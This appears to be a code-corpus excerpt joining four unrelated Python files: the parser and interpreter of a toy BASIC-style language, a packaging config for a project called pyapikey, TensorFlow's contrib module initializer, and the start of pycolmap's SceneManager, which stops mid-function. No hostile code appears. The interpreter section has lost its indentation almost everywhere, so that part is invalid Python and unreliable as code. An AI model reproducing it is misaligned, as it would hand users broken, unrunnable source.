func_def = res.register(self.func_def())
if res.error: return res
return res.success(func_def)
return res.failure(InvalidSyntaxError(
tok.pos_start, tok.pos_end,
"Expected int, float, identifier, '+', '-', '(', 'IF', 'FOR', 'WHILE', 'FUN'"
))
def if_expr(self):
res = ParseResult()
cases = []
else_case = None
if not self.current_tok.matches(TT_KEYWORD, 'IF'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'IF'"
))
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
cases.append((condition, expr))
while self.current_tok.matches(TT_KEYWORD, 'ELIF'):
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
expr = res.register(self.expr())
if res.error: return res
cases.append((condition, expr))
if self.current_tok.matches(TT_KEYWORD, 'ELSE'):
res.register_advancement()
self.advance()
else_case = res.register(self.expr())
if res.error: return res
return res.success(IfNode(cases, else_case))
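    # e.g. IF x > 0 THEN 1 ELIF x < 0 THEN -1 ELSE 0 yields
    # cases = [(x > 0, 1), (x < 0, -1)] with else_case = 0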
def for_expr(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'FOR'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'FOR'"
))
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier"
))
var_name = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_EQ:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '='"
))
res.register_advancement()
self.advance()
start_value = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'TO'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'TO'"
))
res.register_advancement()
self.advance()
end_value = res.register(self.expr())
if res.error: return res
if self.current_tok.matches(TT_KEYWORD, 'STEP'):
res.register_advancement()
self.advance()
step_value = res.register(self.expr())
if res.error: return res
else:
step_value = None
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
body = res.register(self.expr())
if res.error: return res
return res.success(ForNode(var_name, start_value, end_value, step_value, body))
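    # e.g. FOR i = 1 TO 5 THEN i; STEP is optional, so step_value may stay
    # None, which the interpreter's ForNode handler treats as a step of 1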
def while_expr(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'WHILE'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'WHILE'"
))
res.register_advancement()
self.advance()
condition = res.register(self.expr())
if res.error: return res
if not self.current_tok.matches(TT_KEYWORD, 'THEN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'THEN'"
))
res.register_advancement()
self.advance()
body = res.register(self.expr())
if res.error: return res
return res.success(WhileNode(condition, body))
def func_def(self):
res = ParseResult()
if not self.current_tok.matches(TT_KEYWORD, 'FUN'):
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected 'FUN'"
))
res.register_advancement()
self.advance()
if self.current_tok.type == TT_IDENTIFIER:
var_name_tok = self.current_tok
res.register_advancement()
self.advance()
if self.current_tok.type != TT_LPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '('"
))
else:
var_name_tok = None
if self.current_tok.type != TT_LPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier or '('"
))
res.register_advancement()
self.advance()
arg_name_toks = []
if self.current_tok.type == TT_IDENTIFIER:
arg_name_toks.append(self.current_tok)
res.register_advancement()
self.advance()
while self.current_tok.type == TT_COMMA:
res.register_advancement()
self.advance()
if self.current_tok.type != TT_IDENTIFIER:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier"
))
arg_name_toks.append(self.current_tok)
res.register_advancement()
self.advance()
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected ',' or ')'"
))
else:
if self.current_tok.type != TT_RPAREN:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected identifier or ')'"
))
res.register_advancement()
self.advance()
if self.current_tok.type != TT_ARROW:
return res.failure(InvalidSyntaxError(
self.current_tok.pos_start, self.current_tok.pos_end,
f"Expected '->'"
))
res.register_advancement()
self.advance()
node_to_return = res.register(self.expr())
if res.error: return res
return res.success(FuncDefNode(
var_name_tok,
arg_name_toks,
node_to_return
))
###################################
def bin_op(self, func_a, ops, func_b=None):
if func_b == None:
func_b = func_a
res = ParseResult()
left = res.register(func_a())
if res.error: return res
while self.current_tok.type in ops or (self.current_tok.type, self.current_tok.value) in ops:
op_tok = self.current_tok
res.register_advancement()
self.advance()
right = res.register(func_b())
if res.error: return res
left = BinOpNode(left, op_tok, right)
return res.success(left)
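    # bin_op() is the generic left-associative driver shared by expr, comp_expr,
    # arith_expr and term: "1 + 2 + 3" builds ((INT:1, PLUS, INT:2), PLUS, INT:3)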
#######################################
# RUNTIME RESULT
#######################################
class RTResult:
def __init__(self):
self.value = None
self.error = None
def register(self, res):
self.error = res.error
return res.value
def success(self, value):
self.value = value
return self
def failure(self, error):
self.error = error
return self
#######################################
# VALUES
#######################################
class Value:
def __init__(self):
self.set_pos()
self.set_context()
def set_pos(self, pos_start=None, pos_end=None):
self.pos_start = pos_start
self.pos_end = pos_end
return self
def set_context(self, context=None):
self.context = context
return self
def added_to(self, other):
return None, self.illegal_operation(other)
def subbed_by(self, other):
return None, self.illegal_operation(other)
def multed_by(self, other):
return None, self.illegal_operation(other)
def dived_by(self, other):
return None, self.illegal_operation(other)
def powed_by(self, other):
return None, self.illegal_operation(other)
def get_comparison_eq(self, other):
return None, self.illegal_operation(other)
def get_comparison_ne(self, other):
return None, self.illegal_operation(other)
def get_comparison_lt(self, other):
return None, self.illegal_operation(other)
def get_comparison_gt(self, other):
return None, self.illegal_operation(other)
def get_comparison_lte(self, other):
return None, self.illegal_operation(other)
def get_comparison_gte(self, other):
return None, self.illegal_operation(other)
def anded_by(self, other):
return None, self.illegal_operation(other)
def ored_by(self, other):
return None, self.illegal_operation(other)
def notted(self):
        return None, self.illegal_operation()
def execute(self, args):
return RTResult().failure(self.illegal_operation())
def copy(self):
raise Exception('No copy method defined')
def is_true(self):
return False
def illegal_operation(self, other=None):
if not other: other = self
return RTError(
self.pos_start, other.pos_end,
'Illegal operation',
self.context
)
class Number(Value):
def __init__(self, value):
super().__init__()
self.value = value
def added_to(self, other):
if isinstance(other, Number):
return Number(self.value + other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def subbed_by(self, other):
if isinstance(other, Number):
return Number(self.value - other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def multed_by(self, other):
if isinstance(other, Number):
return Number(self.value * other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def dived_by(self, other):
if isinstance(other, Number):
if other.value == 0:
return None, RTError(
other.pos_start, other.pos_end,
'Division by zero',
self.context
)
return Number(self.value / other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def powed_by(self, other):
if isinstance(other, Number):
return Number(self.value ** other.value).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_eq(self, other):
if isinstance(other, Number):
return Number(int(self.value == other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_ne(self, other):
if isinstance(other, Number):
return Number(int(self.value != other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lt(self, other):
if isinstance(other, Number):
return Number(int(self.value < other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gt(self, other):
if isinstance(other, Number):
return Number(int(self.value > other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_lte(self, other):
if isinstance(other, Number):
return Number(int(self.value <= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def get_comparison_gte(self, other):
if isinstance(other, Number):
return Number(int(self.value >= other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def anded_by(self, other):
if isinstance(other, Number):
return Number(int(self.value and other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def ored_by(self, other):
if isinstance(other, Number):
return Number(int(self.value or other.value)).set_context(self.context), None
else:
return None, Value.illegal_operation(self, other)
def notted(self):
return Number(1 if self.value == 0 else 0).set_context(self.context), None
def copy(self):
copy = Number(self.value)
copy.set_pos(self.pos_start, self.pos_end)
copy.set_context(self.context)
return copy
def is_true(self):
return self.value != 0
def __repr__(self):
return str(self.value)
class Function(Value):
def __init__(self, name, body_node, arg_names):
super().__init__()
self.name = name or "<anonymous>"
self.body_node = body_node
self.arg_names = arg_names
def execute(self, args):
res = RTResult()
interpreter = Interpreter()
new_context = Context(self.name, self.context, self.pos_start)
new_context.symbol_table = SymbolTable(new_context.parent.symbol_table)
if len(args) > len(self.arg_names):
return res.failure(RTError(
self.pos_start, self.pos_end,
f"{len(args) - len(self.arg_names)} too many args passed into '{self.name}'",
self.context
))
if len(args) < len(self.arg_names):
return res.failure(RTError(
self.pos_start, self.pos_end,
f"{len(self.arg_names) - len(args)} too few args passed into '{self.name}'",
self.context
))
for i in range(len(args)):
arg_name = self.arg_names[i]
arg_value = args[i]
arg_value.set_context(new_context)
new_context.symbol_table.set(arg_name, arg_value)
value = res.register(interpreter.visit(self.body_node, new_context))
if res.error: return res
return res.success(value)
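    # execute() enforces arity, binds each argument into the child context's
    # SymbolTable, then evaluates the stored body_node with a fresh Interpreter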
def copy(self):
copy = Function(self.name, self.body_node, self.arg_names)
copy.set_context(self.context)
copy.set_pos(self.pos_start, self.pos_end)
return copy
def __repr__(self):
return f"<function {self.name}>"
#######################################
# CONTEXT
#######################################
class Context:
def __init__(self, display_name, parent=None, parent_entry_pos=None):
self.display_name = display_name
self.parent = parent
self.parent_entry_pos = parent_entry_pos
self.symbol_table = None
#######################################
# SYMBOL TABLE
#######################################
class SymbolTable:
def __init__(self, parent=None):
self.symbols = {}
self.parent = parent
def get(self, name):
value = self.symbols.get(name, None)
if value == None and self.parent:
return self.parent.get(name)
return value
def set(self, name, value):
self.symbols[name] = value
def remove(self, name):
del self.symbols[name]
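    # get() falls back to the parent table, so a function body resolves names
    # from enclosing scopes; set() always writes into the current table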
#######################################
# INTERPRETER
#######################################
class Interpreter:
def visit(self, node, context):
method_name = f'visit_{type(node).__name__}'
method = getattr(self, method_name, self.no_visit_method)
return method(node, context)
def no_visit_method(self, node, context):
raise Exception(f'No visit_{type(node).__name__} method defined')
###################################
def visit_NumberNode(self, node, context):
return RTResult().success(
Number(node.tok.value).set_context(context).set_pos(node.pos_start, node.pos_end)
)
def visit_VarAccessNode(self, node, context):
res = RTResult()
var_name = node.var_name_tok.value
value = context.symbol_table.get(var_name)
if not value:
return res.failure(RTError(
node.pos_start, node.pos_end,
f"'{var_name}' is not defined",
context
))
value = value.copy().set_pos(node.pos_start, node.pos_end)
return res.success(value)
def visit_VarAssignNode(self, node, context):
res = RTResult()
var_name = node.var_name_tok.value
value = res.register(self.visit(node.value_node, context))
if res.error: return res
context.symbol_table.set(var_name, value)
return res.success(value)
def visit_BinOpNode(self, node, context):
res = RTResult()
left = res.register(self.visit(node.left_node, context))
if res.error: return res
right = res.register(self.visit(node.right_node, context))
if res.error: return res
if node.op_tok.type == TT_PLUS:
result, error = left.added_to(right)
elif node.op_tok.type == TT_MINUS:
result, error = left.subbed_by(right)
elif node.op_tok.type == TT_MUL:
result, error = left.multed_by(right)
elif node.op_tok.type == TT_DIV:
result, error = left.dived_by(right)
elif node.op_tok.type == TT_POW:
result, error = left.powed_by(right)
elif node.op_tok.type == TT_EE:
result, error = left.get_comparison_eq(right)
elif node.op_tok.type == TT_NE:
result, error = left.get_comparison_ne(right)
elif node.op_tok.type == TT_LT:
result, error = left.get_comparison_lt(right)
elif node.op_tok.type == TT_GT:
result, error = left.get_comparison_gt(right)
elif node.op_tok.type == TT_LTE:
result, error = left.get_comparison_lte(right)
elif node.op_tok.type == TT_GTE:
result, error = left.get_comparison_gte(right)
elif node.op_tok.matches(TT_KEYWORD, 'AND'):
result, error = left.anded_by(right)
elif node.op_tok.matches(TT_KEYWORD, 'OR'):
result, error = left.ored_by(right)
if error:
return res.failure(error)
else:
return res.success(result.set_pos(node.pos_start, node.pos_end))
def visit_UnaryOpNode(self, node, context):
res = RTResult()
number = res.register(self.visit(node.node, context))
if res.error: return res
error = None
if node.op_tok.type == TT_MINUS:
number, error = number.multed_by(Number(-1))
elif node.op_tok.matches(TT_KEYWORD, 'NOT'):
number, error = number.notted()
if error:
return res.failure(error)
else:
return res.success(number.set_pos(node.pos_start, node.pos_end))
def visit_IfNode(self, node, context):
res = RTResult()
for condition, expr in node.cases:
condition_value = res.register(self.visit(condition, context))
if res.error: return res
if condition_value.is_true():
expr_value = res.register(self.visit(expr, context))
if res.error: return res
return res.success(expr_value)
if node.else_case:
else_value = res.register(self.visit(node.else_case, context))
if res.error: return res
return res.success(else_value)
return res.success(None)
def visit_ForNode(self, node, context):
res = RTResult()
start_value = res.register(self.visit(node.start_value_node, context))
if res.error: return res
end_value = res.register(self.visit(node.end_value_node, context))
if res.error: return res
if node.step_value_node:
step_value = res.register(self.visit(node.step_value_node, context))
if res.error: return res
else:
step_value = Number(1)
i = start_value.value
if step_value.value >= 0:
condition = lambda: i < end_value.value
else:
condition = lambda: i > end_value.value
while condition():
context.symbol_table.set(node.var_name_tok.value, Number(i))
i += step_value.value
res.register(self.visit(node.body_node, context))
if res.error: return res
return res.success(None)
def visit_WhileNode(self, node, context):
res = RTResult()
while True:
condition = res.register(self.visit(node.condition_node, context))
if res.error: return res
if not condition.is_true(): break
res.register(self.visit(node.body_node, context))
if res.error: return res
return res.success(None)
def visit_FuncDefNode(self, node, context):
res = RTResult()
func_name = node.var_name_tok.value if node.var_name_tok else None
body_node = node.body_node
arg_names = [arg_name.value for arg_name in node.arg_name_toks]
func_value = Function(func_name, body_node, arg_names).set_context(context).set_pos(node.pos_start, node.pos_end)
if node.var_name_tok:
context.symbol_table.set(func_name, func_value)
return res.success(func_value)
def visit_CallNode(self, node, context):
res = RTResult()
args = []
value_to_call = res.register(self.visit(node.node_to_call, context))
if res.error: return res
value_to_call = value_to_call.copy().set_pos(node.pos_start, node.pos_end)
for arg_node in node.arg_nodes:
args.append(res.register(self.visit(arg_node, context)))
if res.error: return res
return_value = res.register(value_to_call.execute(args))
if res.error: return res
return res.success(return_value)
#######################################
# RUN
#######################################
global_symbol_table = SymbolTable()
global_symbol_table.set("NULL", Number(0))
global_symbol_table.set("FALSE", Number(0))
global_symbol_table.set("TRUE", Number(1))
def run(fn, text):
# Generate tokens
lexer = Lexer(fn, text)
tokens, error = lexer.make_tokens()
if error: return None, error
# Generate AST
parser = Parser(tokens)
ast = parser.parse()
if ast.error: return None, ast.error
# Run program
interpreter = Interpreter()
context = Context('<program>')
context.symbol_table = global_symbol_table
result = interpreter.visit(ast.node, context)
return result.value, result.error
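# --- Usage sketch (not part of the original file) ---
# A minimal REPL driving run() above; the "basic > " prompt is illustrative,
# and error.as_string() assumes the Error classes defined earlier in this
# file expose that method.
if __name__ == "__main__":
	while True:
		text = input("basic > ")
		if not text.strip():
			continue
		result, error = run("<stdin>", text)
		if error:
			print(error.as_string())
		elif result is not None:
			print(result)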
f70b80aef77d272ca54798b4da68fcd06046255f | 2,174 | py | Python | config/project.py | veltzer/pyapikey | 4e7ea6d5a74263f76fc344489581f03818eb57c6 | ["MIT"] | null | null | null
import pyclassifiers.values
import config.general
import config.helpers
project_github_username = "veltzer"
project_name = "pyapikey"
github_repo_name = project_name
project_website = f"https://{project_github_username}.github.io/{project_name}"
project_website_source = f"https://github.com/{project_github_username}/{project_name}"
project_website_git = f"git://github.com/{project_github_username}/{project_name}.git"
project_website_download_ppa = "https://launchpad.net/~mark-veltzer/+archive/ubuntu/ppa"
project_website_download_src = project_website_source
# project_paypal_donate_button_id="ASPRXR59H2NTQ"
# project_google_analytics_tracking_id="UA-56436979-1"
project_long_description = "access api keys from code"
project_short_description = project_long_description
# keywords to put on html pages or for search; don't put the name of the project or my details
# as they will be added automatically...
project_keywords = [
"api",
"key",
"python",
"secret",
]
project_license = "MIT"
project_year_started = "2020"
project_description = project_long_description
project_platforms = [
"python3",
]
project_classifiers = [
pyclassifiers.values.DevelopmentStatus__4_Beta,
pyclassifiers.values.Environment__Console,
pyclassifiers.values.OperatingSystem__OSIndependent,
pyclassifiers.values.ProgrammingLanguage__Python,
pyclassifiers.values.ProgrammingLanguage__Python__3,
pyclassifiers.values.ProgrammingLanguage__Python__3__Only,
pyclassifiers.values.ProgrammingLanguage__Python__36,
pyclassifiers.values.ProgrammingLanguage__Python__37,
pyclassifiers.values.ProgrammingLanguage__Python__38,
pyclassifiers.values.Topic__Utilities,
pyclassifiers.values.License__OSIApproved__MITLicense,
]
project_data_files = []
project_google_analytics_tracking_id = None
project_paypal_donate_button_id = None
codacy_id = None
project_copyright_years = config.helpers.get_copyright_years(project_year_started)
project_google_analytics_snipplet = config.helpers.get_google_analytics(project_google_analytics_tracking_id)
project_paypal_donate_button_snipplet = config.helpers.get_paypal(project_paypal_donate_button_id)
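# --- Usage sketch (not part of the original file) ---
# Hypothetical consumer: dump the derived project metadata, e.g. to verify
# what a packaging template would receive. Everything referenced is defined
# above in this module.
if __name__ == "__main__":
    for key, value in sorted(globals().items()):
        if key.startswith("project_"):
            print(f"{key} = {value!r}")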
f70b810ec69d135f1133e7a8b3cdbfb8803aca24 | 3,377 | py | Python | tensorflow/contrib/__init__.py | monokrome/tensorflow | 2533ada7dd45b84d60677b8735e013d21044651a | ["Apache-2.0"] | 1 | 2018-12-08T18:04:55.000Z | 2018-12-08T18:04:55.000Z
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""contrib module containing volatile or experimental code."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Add projects here, they will show up under tf.contrib.
from tensorflow.contrib import bayesflow
from tensorflow.contrib import cloud
from tensorflow.contrib import compiler
from tensorflow.contrib import copy_graph
from tensorflow.contrib import crf
from tensorflow.contrib import cudnn_rnn
from tensorflow.contrib import data
from tensorflow.contrib import deprecated
from tensorflow.contrib import distributions
from tensorflow.contrib import factorization
from tensorflow.contrib import framework
from tensorflow.contrib import graph_editor
from tensorflow.contrib import grid_rnn
from tensorflow.contrib import image
from tensorflow.contrib import input_pipeline
from tensorflow.contrib import integrate
from tensorflow.contrib import keras
from tensorflow.contrib import kernel_methods
from tensorflow.contrib import labeled_tensor
from tensorflow.contrib import layers
from tensorflow.contrib import learn
from tensorflow.contrib import legacy_seq2seq
from tensorflow.contrib import linalg
from tensorflow.contrib import linear_optimizer
from tensorflow.contrib import lookup
from tensorflow.contrib import losses
from tensorflow.contrib import memory_stats
from tensorflow.contrib import metrics
from tensorflow.contrib import nccl
from tensorflow.contrib import nn
from tensorflow.contrib import opt
from tensorflow.contrib import quantization
from tensorflow.contrib import resampler
from tensorflow.contrib import rnn
from tensorflow.contrib import saved_model
from tensorflow.contrib import seq2seq
from tensorflow.contrib import signal
from tensorflow.contrib import slim
from tensorflow.contrib import solvers
from tensorflow.contrib import sparsemax
from tensorflow.contrib import staging
from tensorflow.contrib import stat_summarizer
from tensorflow.contrib import stateless
from tensorflow.contrib import tensor_forest
from tensorflow.contrib import tensorboard
from tensorflow.contrib import testing
from tensorflow.contrib import tfprof
from tensorflow.contrib import timeseries
from tensorflow.contrib import tpu
from tensorflow.contrib import training
from tensorflow.contrib import util
from tensorflow.contrib.ndlstm import python as ndlstm
from tensorflow.contrib.remote_fused_graph import pylib as remote_fused_graph
from tensorflow.contrib.specs import python as specs
from tensorflow.python.util.lazy_loader import LazyLoader
ffmpeg = LazyLoader("ffmpeg",
globals(), "tensorflow.contrib.ffmpeg")
del LazyLoader
del absolute_import
del division
del print_function
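# --- Usage sketch (not part of the original file) ---
# LazyLoader defers importing tensorflow.contrib.ffmpeg until the attribute
# is first touched, so importing tf.contrib succeeds even where the ffmpeg
# ops are unavailable. Hypothetical trigger under TF 1.x:
#   import tensorflow as tf
#   waveform = tf.contrib.ffmpeg.decode_audio(  # first access imports ffmpeg
#       audio_binary, file_format="wav", samples_per_second=16000,
#       channel_count=1)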
f70b81350664ee0818d7513eb9f617928ed6b5e5 | 26,952 | py | Python | third_party/pycolmap/pycolmap/scene_manager.py | dukebw/nerfies | b30fe19edb6435e770b35dc07aab44ae62c96278 | ["Apache-2.0"] | null | null | null
# Author: True Price <jtprice at cs.unc.edu>
from collections import OrderedDict, defaultdict
from io import StringIO
from itertools import combinations
import os
import struct
from .camera import Camera
from .image import Image
import numpy as np
from .rotation import Quaternion
# -------------------------------------------------------------------------------
#
# SceneManager
#
# -------------------------------------------------------------------------------
class SceneManager:
INVALID_POINT3D = np.uint64(-1)
def __init__(self, colmap_results_folder, image_path=None):
self.folder = colmap_results_folder
if not self.folder.endswith("/"):
self.folder += "/"
self.image_path = None
self.load_colmap_project_file(image_path=image_path)
self.cameras = OrderedDict()
self.images = OrderedDict()
self.name_to_image_id = dict()
self.last_camera_id = 0
self.last_image_id = 0
# Nx3 array of point3D xyz's
self.points3D = np.zeros((0, 3))
# for each element in points3D, stores the id of the point
self.point3D_ids = np.empty(0)
# point3D_id => index in self.points3D
self.point3D_id_to_point3D_idx = dict()
# point3D_id => [(image_id, point2D idx in image)]
self.point3D_id_to_images = dict()
self.point3D_colors = np.zeros((0, 3), dtype=np.uint8)
self.point3D_errors = np.zeros(0)
# ---------------------------------------------------------------------------
def load_colmap_project_file(self, project_file=None, image_path=None):
if project_file is None:
project_file = self.folder + "project.ini"
self.image_path = image_path
if self.image_path is None:
try:
with open(project_file, "r") as f:
for line in iter(f.readline, ""):
if line.startswith("image_path"):
self.image_path = line[11:].strip()
break
        except OSError:
            pass
if self.image_path is None:
print("Warning: image_path not found for reconstruction")
elif not self.image_path.endswith("/"):
self.image_path += "/"
# ---------------------------------------------------------------------------
def load(self):
self.load_cameras()
self.load_images()
self.load_points3D()
# ---------------------------------------------------------------------------
def load_cameras(self, input_file=None):
if input_file is None:
input_file = self.folder + "cameras.bin"
if os.path.exists(input_file):
self._load_cameras_bin(input_file)
else:
input_file = self.folder + "cameras.txt"
if os.path.exists(input_file):
self._load_cameras_txt(input_file)
else:
raise IOError("no cameras file found")
def _load_cameras_bin(self, input_file):
self.cameras = OrderedDict()
with open(input_file, "rb") as f:
num_cameras = struct.unpack("L", f.read(8))[0]
for _ in range(num_cameras):
camera_id, camera_type, w, h = struct.unpack("IiLL", f.read(24))
num_params = Camera.GetNumParams(camera_type)
params = struct.unpack("d" * num_params, f.read(8 * num_params))
self.cameras[camera_id] = Camera(camera_type, w, h, params)
self.last_camera_id = max(self.last_camera_id, camera_id)
def _load_cameras_txt(self, input_file):
self.cameras = OrderedDict()
with open(input_file, "r") as f:
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
data = line.split()
camera_id = int(data[0])
self.cameras[camera_id] = Camera(
data[1], int(data[2]), int(data[3]), list(map(float, data[4:]))
)
self.last_camera_id = max(self.last_camera_id, camera_id)
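    # Illustrative cameras.txt record (format mirrors _save_cameras_txt below):
    #   CAMERA_ID MODEL WIDTH HEIGHT PARAMS[]
    # e.g. "1 PINHOLE 640 480 525.0 525.0 320.0 240.0" for a pinhole model
    # with fx fy cx cy parameters (example values only).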
# ---------------------------------------------------------------------------
def load_images(self, input_file=None):
if input_file is None:
input_file = self.folder + "images.bin"
if os.path.exists(input_file):
self._load_images_bin(input_file)
else:
input_file = self.folder + "images.txt"
if os.path.exists(input_file):
self._load_images_txt(input_file)
else:
raise IOError("no images file found")
def _load_images_bin(self, input_file):
self.images = OrderedDict()
with open(input_file, "rb") as f:
num_images = struct.unpack("L", f.read(8))[0]
for _ in range(num_images):
image_id = struct.unpack("I", f.read(4))[0]
q = Quaternion(np.array(struct.unpack("dddd", f.read(32))))
t = np.array(struct.unpack("ddd", f.read(24)))
camera_id = struct.unpack("I", f.read(4))[0]
name = b"".join(c for c in iter(lambda: f.read(1), b"\x00")).decode()
image = Image(name, camera_id, q, t)
num_points2D = struct.unpack("L", f.read(8))[0]
image.points2D = np.empty((num_points2D, 2))
image.point3D_ids = np.empty(num_points2D, dtype=np.uint64)
for j in range(num_points2D):
image.points2D[j] = np.array(struct.unpack("dd", f.read(16)))
image.point3D_ids[j] = np.array(struct.unpack("Q", f.read(8)))
self.images[image_id] = image
self.name_to_image_id[image.name] = image_id
self.last_image_id = max(self.last_image_id, image_id)
def _load_images_txt(self, input_file):
self.images = OrderedDict()
with open(input_file, "r") as f:
is_camera_description_line = False
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
is_camera_description_line = not is_camera_description_line
data = line.split()
if is_camera_description_line:
image_id = int(data[0])
image = Image(
data[-1],
int(data[-2]),
Quaternion(np.array(list(map(float, data[1:5])))),
np.array(list(map(float, data[5:8]))),
)
else:
image.points2D = np.array(
[list(map(float, data[::3])), list(map(float, data[1::3]))]
).T
image.point3D_ids = np.array(list(map(np.uint64, data[2::3])))
# automatically remove points without an associated 3D point
# mask = (image.point3D_ids != SceneManager.INVALID_POINT3D)
# image.points2D = image.points2D[mask]
# image.point3D_ids = image.point3D_ids[mask]
self.images[image_id] = image
self.name_to_image_id[image.name] = image_id
self.last_image_id = max(self.last_image_id, image_id)
# ---------------------------------------------------------------------------
def load_points3D(self, input_file=None):
if input_file is None:
input_file = self.folder + "points3D.bin"
if os.path.exists(input_file):
self._load_points3D_bin(input_file)
else:
input_file = self.folder + "points3D.txt"
if os.path.exists(input_file):
self._load_points3D_txt(input_file)
else:
raise IOError("no points3D file found")
def _load_points3D_bin(self, input_file):
with open(input_file, "rb") as f:
num_points3D = struct.unpack("L", f.read(8))[0]
self.points3D = np.empty((num_points3D, 3))
self.point3D_ids = np.empty(num_points3D, dtype=np.uint64)
self.point3D_colors = np.empty((num_points3D, 3), dtype=np.uint8)
self.point3D_id_to_point3D_idx = dict()
self.point3D_id_to_images = dict()
self.point3D_errors = np.empty(num_points3D)
for i in range(num_points3D):
self.point3D_ids[i] = struct.unpack("L", f.read(8))[0]
self.points3D[i] = struct.unpack("ddd", f.read(24))
self.point3D_colors[i] = struct.unpack("BBB", f.read(3))
self.point3D_errors[i] = struct.unpack("d", f.read(8))[0]
self.point3D_id_to_point3D_idx[self.point3D_ids[i]] = i
# load (image id, point2D idx) pairs
track_len = struct.unpack("L", f.read(8))[0]
data = struct.unpack("I" * (2 * track_len), f.read(2 * track_len * 4))
self.point3D_id_to_images[self.point3D_ids[i]] = np.array(
data, dtype=np.uint32
).reshape(track_len, 2)
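    # Binary points3D record layout, as read above (native struct formats, so
    # an 8-byte unsigned long, i.e. a 64-bit Unix platform, is assumed):
    #   uint64 point3D_id | 3 x float64 xyz | 3 x uint8 rgb | float64 error |
    #   uint64 track_len | track_len x (uint32 image_id, uint32 point2D_idx)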
def _load_points3D_txt(self, input_file):
self.points3D = []
self.point3D_ids = []
self.point3D_colors = []
self.point3D_id_to_point3D_idx = dict()
self.point3D_id_to_images = dict()
self.point3D_errors = []
with open(input_file, "r") as f:
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
data = line.split()
point3D_id = np.uint64(data[0])
self.point3D_ids.append(point3D_id)
self.point3D_id_to_point3D_idx[point3D_id] = len(self.points3D)
self.points3D.append(list(map(np.float64, data[1:4])))
self.point3D_colors.append(list(map(np.uint8, data[4:7])))
self.point3D_errors.append(np.float64(data[7]))
# load (image id, point2D idx) pairs
self.point3D_id_to_images[point3D_id] = np.array(
list(map(np.uint32, data[8:]))
).reshape(-1, 2)
self.points3D = np.array(self.points3D)
self.point3D_ids = np.array(self.point3D_ids)
self.point3D_colors = np.array(self.point3D_colors)
self.point3D_errors = np.array(self.point3D_errors)
# ---------------------------------------------------------------------------
def save(self, output_folder, binary=True):
self.save_cameras(output_folder, binary=binary)
self.save_images(output_folder, binary=binary)
self.save_points3D(output_folder, binary=binary)
# ---------------------------------------------------------------------------
def save_cameras(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "cameras.bin" if binary else "cameras.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_cameras_bin(output_file)
else:
self._save_cameras_txt(output_file)
def _save_cameras_bin(self, output_file):
